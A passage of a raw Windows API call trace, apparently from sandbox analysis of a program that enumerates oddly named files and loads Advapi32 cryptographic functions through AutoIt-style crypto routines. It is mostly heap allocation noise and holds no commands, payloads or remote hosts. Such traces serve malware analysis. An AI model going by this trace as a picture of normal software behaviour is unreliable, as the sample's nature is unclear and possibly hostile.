lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x612d0730, ftCreationTime.dwHighDateTime=0x1d5e2d5, ftLastAccessTime.dwLowDateTime=0x33d059f0, ftLastAccessTime.dwHighDateTime=0x1d5e3a1, ftLastWriteTime.dwLowDateTime=0x33d059f0, ftLastWriteTime.dwHighDateTime=0x1d5e3a1, nFileSizeHigh=0x0, nFileSizeLow=0x1eef, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="7eNkYBcGM pJGAedeLc.mp3", cAlternateFileName="7ENKYB~1.MP3")) returned 0x41ac740 [0111.481] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0111.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0111.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0111.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0111.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0111.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0111.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0111.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0111.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0111.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0111.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0111.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0111.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0111.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0111.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0111.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0111.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0111.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0111.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0111.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.481] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0111.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0111.482] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0111.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0111.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0111.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0111.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0111.482] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0111.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0111.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0111.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0111.482] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0111.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0111.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0111.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0111.482] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0111.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0111.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0111.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0111.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0111.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0111.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0111.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0111.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0111.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0111.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0111.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0111.482] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0111.482] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0111.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0111.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0111.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0111.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0111.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0111.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0111.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0111.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0111.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0111.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0111.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0111.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0111.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0111.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0111.483] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0111.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0111.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0111.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0111.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0111.483] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0111.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0111.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0111.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0111.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0111.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0111.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0111.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0111.484] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0111.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0111.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0111.484] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0111.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0111.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0111.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0111.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0111.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0111.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0111.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0111.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0111.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0111.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0111.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0111.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0111.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0111.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0111.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0111.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0111.484] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0111.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0111.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0111.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0111.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0111.528] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0111.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.528] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 1 [0111.528] TranslateMessage (lpMsg=0x144ebd4) returned 0 [0111.528] DispatchMessageW (lpMsg=0x144ebd4) returned 0x0 [0111.528] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0111.528] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0111.528] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0111.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0111.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0111.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0111.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0111.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0111.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0111.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0111.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0111.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0111.529] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0111.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0111.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0111.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0111.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0111.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0111.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0111.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0111.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0111.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0111.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0111.529] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0111.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0111.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0111.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0111.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0111.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0111.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0111.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0111.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0111.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0111.529] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0111.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0111.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0111.530] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0111.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0111.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0111.530] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0111.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0111.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0111.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0111.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0111.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0111.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0111.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0111.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0111.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0111.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0111.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0111.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0111.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0111.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0111.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0111.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0111.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0111.530] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0111.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0111.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0111.531] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0111.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0111.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0111.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0111.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0111.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0111.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0111.531] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0111.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0111.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0111.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0111.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0111.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0111.531] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0111.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0111.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0111.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0111.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0111.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0111.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0111.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0111.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0111.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0111.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0111.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0111.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0111.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0111.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0111.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0111.532] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0111.532] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0111.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0111.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0111.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0111.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797088, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0111.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0111.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0111.533] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0111.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0111.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0111.533] HeapFree (in: 